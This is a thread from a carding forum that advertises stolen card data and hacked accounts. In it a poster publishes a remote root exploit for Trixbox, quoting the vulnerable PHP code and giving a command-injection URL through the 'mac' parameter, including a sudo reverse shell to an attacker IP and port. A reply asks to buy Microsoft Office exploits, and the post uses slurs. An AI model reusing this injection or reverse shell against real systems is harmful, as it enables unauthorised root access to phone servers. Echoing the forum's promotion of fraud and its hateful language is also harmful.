Welcome to the Dark Market! - We will be closing Open Registration on 31-January-2017 so please grab your Free Account (Click here) while you can. It's FREE and takes just 1 minute!
Cardingf.com - #1 Carding Forum, Top Carders Forums, Carder Forum with Legit Carders and Hackers. Real WU, MG and Bank Transfers. CVV
  • You can contact Admin to purchase ad or get help via Email: [email protected]

  • - OUR NEW DOMAIN: CARDINGF.COM -
    Connection secured via HTTPS & Anti-DDoS Protection -   

    #1 Money Making Forum - Carding Forum - Carders Forum
    Official Escrow & Donation Bitcoin Wallet:
    Buy AD on Forum by Clicking Here! 
     Bank Transfers, PayPal Skrill Hacked 


    Thread Rating:
    • 26 Vote(s) - 3.04 Average
    • 1
    • 2
    • 3
    • 4
    • 5

    [-]
    Tags
    how do we exploit

    How do we Exploit.
    #1
    # App : Trixbox all versions
    # vendor : trixbox.com
    # Author : i-Hmx
    # mail : n0p1337@gmail.com
    # Home : security arrays inc , sec4ever.com ,exploit4arab.net

    Well well well , we decided to give schmoozecom a break and have a look @
    fonality products
    do you think they have better product than the (Award winning) trixbox!!!
    I don't think com
    "Designed and marketed for Fonality's partner community, trixbox Pro is an
    IP-PBX software solution purpose built to support growing SMB businesses.
    A unique hybrid hosted telephony solution; trixbox Pro provides big
    business features at an SMB cost . . blah blah blah"
    What do we have here??
    A 3 years old Sql injection flaw???
    not big deal , and already been reported
    not enough good exploitation , but reported
    A file disclosure flaw???
    save it for later
    let's give Fonality little Remote root Exploit xD
    and also give the "Predictors" some pain in the ass trying to exploit this
    consider it as challenge Wink
    Here we go
    Vulnerable file :
    /var/www/html/maint/modules/endpointcfg/endpoint_aastra.php
    Pice of shit , sorry i mean code

    switch($_action) {
    case 'Edit':
    if ($_REQUEST['newmac']){ // create a new phone from device map
    $mac_address = $_REQUEST['newmac'];
    }
    if ($_REQUEST['mac']){
    $phoneinfo = GetPhone($_REQUEST['mac'],$PhoneType);
    $mac_address=$phoneinfo['mac_address']; } // if there is a
    request ID we Edit otherwise add a new phone

    $freepbx_device_list = GetFreepbxDeviceList();
    $smarty->assign("mac_address", $mac_address);
    $smarty->assign("phone", $phoneinfo);
    $smarty->assign("freepbx_device_list", $freepbx_device_list);

    $smarty->assign("message", $message);
    $template = "endpoint_".$PhoneType."_edit.tpl";
    break;

    case 'Delete':
    exec("rm ".$sipdir.$_REQUEST['mac'].".cfg");
    getSQL("DELETE FROM ".$PhoneType." WHERE
    mac_address='".$_REQUEST['mac']."'",'endpoints');
    $smarty->assign("phones", ListPhones($PhoneType));
    $template = "endpoint_".$PhoneType."_list.tpl";
    break;

    it's obvious we care about this line
    >>>exec("rm ".$sipdir.$_REQUEST['mac'].".cfg");<<<
    Exploitation demo :
    maint/modules/endpointcfg/endpoint_aastra.php?action=Delete&mac=fa;echo
    id>xx;faris
    result will be written to xx
    but this is not the full movie yet ,
    Am here to give fonality an night mare , which take the form of "root"
    privzz
    actually the server is configured by default to allow the web interface
    pages to edit many files @ the root directory
    com any noob can easily execute the "sudo fuck" with out being permited for
    password , and the result is > root
    Demo

    maint/modules/endpointcfg/endpoint_aastra.php?action=Delete&mac=fa;sudo
    bash -i >%26 %2fdev%2ftcp%2fxxx.xxx.xxx.xxx%2f1337 0>%261;faris
    change to your ip and the port you are listening to
    and , Volia , you are root
    now am sure you're happy as pig in shit xD
    Still need more??
    you will notice that you're unable to reach this file due to the http
    firewall
    but actually there is simple and yet dirty trick that allow you to get pass
    through it , and execute your command smooooothely as boat on the river Wink
    And here come the challenge , let's see what the faggots can do with this Wink
    need hint???
    use your mind and fuck off :/

    Big greets fly to the all sec4ever family
    oh , and for voip lames , you can use our 0Days for sure
    but once it become 720Days xD
    Regards,
    Reply
    #2
    I need microsoft office exploits with high execution rate. Let me know if you got this.
    Thanks
    David
    Reply


    Forum Jump:


    Users browsing this thread: 1 Guest(s)